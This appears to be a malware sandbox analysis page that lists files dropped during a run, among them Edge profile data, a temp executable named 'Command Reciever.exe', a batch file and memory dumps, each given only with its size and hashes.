edff40d7f2fbbf329fb8ce540df53b80a3d7218f826fbb1cfcabac71d84d28b7fe78a98c3dc0febd0539a730ed3305064ceec831570eb8dea10dd20d2426549c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57c94b.TMP

Filesize
874B

MD5
26f47c4adbdbaf2e0f1b75d7edefa64b

SHA1
4a3fee9b6b8616341bf742cf6dd3cef3b2771644

SHA256
090920c0b551cfa2d3a780283265c815af4f1bc84f484b0249970f49860ec2c6

SHA512
8cf4313cbb064a0e44b2373dd9fffde5c38f6e2de78a57366108f3d1af42d5cb95c4e0b7e389baf1b830c4a40d34165c46e1f5994d81e78be9fdc54fc3f7dcaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4e720ec44917e3f608086b9466d224e0

SHA1
5073da37f9e2dcc6e6281c65988202e69e243b3c

SHA256
3501e901a75bfb2604295a1162012be5329105b5279c9d3d19b414d228f2108f

SHA512
15020761e6b58d07d2bfb6dbbbf5796f74c995b2f2183ef71f01b1f9128628679515382bf72e34962f0b8290d12a161924d262c9b22fe92a3c1878165ec801cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
050920a212c9ba1bb41b1a943868d7bf

SHA1
3907fb24f6244063d3f55ac8e3e3f405881f4c7f

SHA256
be5227677d0dc12ce5462148e4513c6f801f2fbca0b079634c1b8920c8be52ed

SHA512
0097a0305a1a0073b24fbaa77f553473bb522471eea20d157af2d7f3e844f7dd1c5bcc6fc24b83b8cf0deb013d32cd7212ca56d70c64e5fd60be7815ed9ab29a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

Filesize
5.6MB

MD5
eb01eece5f0887b24a1bd53183d801dc

SHA1
49e92aee8351e3a995d8ec95bc64d7f381dcee28

SHA256
a2b1012a39662b760415ee897388c862457f4f1672897db8dee67e125bf0ad5c

SHA512
83374fdc381d52b64682df5b96f02cb3d487ce12d9231ede8ee9a92ecf72fa4a0d6f91a04e5f6656cccd50f142dd44bbb08e7ecc94b647e0349064dc32a76839

Download Submit
C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Filesize
1.7MB

MD5
65ccd6ecb99899083d43f7c24eb8f869

SHA1
27037a9470cc5ed177c0b6688495f3a51996a023

SHA256
aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

SHA512
533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD869.tmp.bat

Filesize
295B

MD5
380c4224ef956358d5423ce07fc04704

SHA1
20b821e86842bc36a8c13252b5b2efe44baa84fb

SHA256
c6a8e945e0a206e7c7f34e920299e00a69949fdf407a320e810e741aed4292e7

SHA512
26c683d2e1853d94ccecca67f62cd62ff46b961f64eae32b42dfb92cae263cf012a1709b5997feb4f77dca47655b1acfe103fca1b50d2f9264fc7eaa686609e8

Download Submit
memory/716-319-0x0000000000500000-0x0000000000742000-memory.dmp

Filesize
2.3MB

Download
memory/716-320-0x00000000056A0000-0x0000000005C44000-memory.dmp

Filesize
5.6MB

Download
memory/808-387-0x00000186D70B0000-0x00000186D70C2000-memory.dmp

Filesize
72KB

Download
memory/808-365-0x00000186D7D50000-0x00000186D807E000-memory.dmp

Filesize
3.2MB

Download
memory/808-364-0x00000186D6FF0000-0x00000186D7016000-memory.dmp

Filesize
152KB

Download
memory/808-363-0x00000186D7030000-0x00000186D706A000-memory.dmp

Filesize
232KB

Download
memory/808-361-0x00000186D6FC0000-0x00000186D6FE2000-memory.dmp

Filesize
136KB

Download
memory/808-360-0x00000186D6F70000-0x00000186D6FC0000-memory.dmp

Filesize
320KB

Download
memory/808-359-0x00000186D6EC0000-0x00000186D6F72000-memory.dmp

Filesize
712KB

Download
memory/808-357-0x00000186D6C50000-0x00000186D6CBA000-memory.dmp

Filesize
424KB

Download
memory/2136-329-0x0000000000140000-0x00000000007D2000-memory.dmp

Filesize
6.6MB

Download
memory/2136-347-0x0000000008D60000-0x0000000008DC6000-memory.dmp

Filesize
408KB

Download
memory/2136-343-0x0000000005050000-0x000000000505A000-memory.dmp

Filesize
40KB

Download
memory/2136-344-0x0000000005180000-0x00000000051D6000-memory.dmp

Filesize
344KB

Download
memory/2136-335-0x0000000005220000-0x00000000052B2000-memory.dmp

Filesize
584KB

Download
memory/2136-333-0x0000000005070000-0x000000000510C000-memory.dmp

Filesize
624KB

Download
memory/3784-346-0x0000016AF8820000-0x0000016AF882A000-memory.dmp

Filesize
40KB

Download
memory/3784-345-0x0000016AF8800000-0x0000016AF881E000-memory.dmp

Filesize
120KB

Download
memory/3784-342-0x0000016AF9010000-0x0000016AF9086000-memory.dmp

Filesize
472KB

Download
memory/3784-336-0x0000016AF6540000-0x0000016AF6AE2000-memory.dmp

Filesize
5.6MB

Download